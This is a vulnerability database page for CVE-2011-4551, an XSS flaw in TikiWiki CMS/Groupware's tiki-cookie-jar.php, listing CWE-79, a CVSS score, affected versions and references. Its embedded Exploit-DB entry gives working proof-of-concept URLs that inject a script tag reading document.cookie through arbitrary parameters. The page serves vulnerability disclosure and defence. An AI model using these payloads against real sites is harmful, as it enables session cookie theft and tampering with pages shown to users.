CVE-2011-4551 : Detail

CVE-2011-4551

Cross-site Scripting
A03-Injection
3.76%V4
Network
2012-10-01
00h00 +00:00
2024-09-17
04h10 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Cross-site scripting (XSS) vulnerability in tiki-cookie-jar.php in TikiWiki CMS/Groupware before 8.2 and LTS before 6.5 allows remote attackers to inject arbitrary web script or HTML via arbitrary parameters.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 36470

Publication date : 2011-12-19 23h00 +00:00
Author : Stefan Schurtz
EDB Verified : Yes

source: https://www.securityfocus.com/bid/51128/info Tiki Wiki CMS Groupware is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. Tested with Firefox 7.01 Visit this URL http://www.example.com/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss=</style></script><script>alert(document.cookie)</script> -> blank site But when you visit one of this pages, the XSS will be executed http://www.example.com/tiki-8.1/tiki-login.php http://www.example.com/tiki-8.1/tiki-remind_password.php // browser source code show_errors: &#039;y&#039;, xss: &#039;</style></script><script>alert(document.cookie)</script>&#039; }; Another example: http://www.example.com/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss1=</style></script><script>alert(document.cookie)</script> http://www.example.com/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss2=</style></script><script>alert(document.cookie)</script> http://www.example.com/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss3=</style></script><script>alert(document.cookie)</script> All of them will be executed! // browser source code show_errors: &#039;y&#039;, xss1: &#039;</style></script><script>alert(document.cookie)</script>&#039;, xss2: &#039;</style></script><script>alert(document.cookie)</script>&#039;, xss3: &#039;</style></script><script>alert(document.cookie)</script>&#039; };

Products Mentioned

Configuraton 0

Tiki>>Tikiwiki_cms\/groupware >> Version To (including) 8.1

Tiki>>Tikiwiki_cms\/groupware >> Version 2.2

Tiki>>Tikiwiki_cms\/groupware >> Version 3.0

Tiki>>Tikiwiki_cms\/groupware >> Version 3.1

Tiki>>Tikiwiki_cms\/groupware >> Version 3.2

Tiki>>Tikiwiki_cms\/groupware >> Version 3.3

Tiki>>Tikiwiki_cms\/groupware >> Version 3.4

Tiki>>Tikiwiki_cms\/groupware >> Version 3.5

Tiki>>Tikiwiki_cms\/groupware >> Version 4

Tiki>>Tikiwiki_cms\/groupware >> Version 4.0

Tiki>>Tikiwiki_cms\/groupware >> Version 4.1

Tiki>>Tikiwiki_cms\/groupware >> Version 4.2

Tiki>>Tikiwiki_cms\/groupware >> Version 5.0

Tiki>>Tikiwiki_cms\/groupware >> Version 5.1

Tiki>>Tikiwiki_cms\/groupware >> Version 5.2

Tiki>>Tikiwiki_cms\/groupware >> Version 5.3

Tiki>>Tikiwiki_cms\/groupware >> Version 6.0

Tiki>>Tikiwiki_cms\/groupware >> Version 6.1

Tiki>>Tikiwiki_cms\/groupware >> Version 6.2

Tiki>>Tikiwiki_cms\/groupware >> Version 7.0

Tiki>>Tikiwiki_cms\/groupware >> Version 7.1

Tiki>>Tikiwiki_cms\/groupware >> Version 7.2

Tiki>>Tikiwiki_cms\/groupware >> Version 8.0

Configuraton 0

Tiki>>Tikiwiki_cms\/groupware >> Version To (including) 6.3

References

http://secunia.com/advisories/47278
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.osvdb.org/77966
Tags : vdb-entry, x_refsource_OSVDB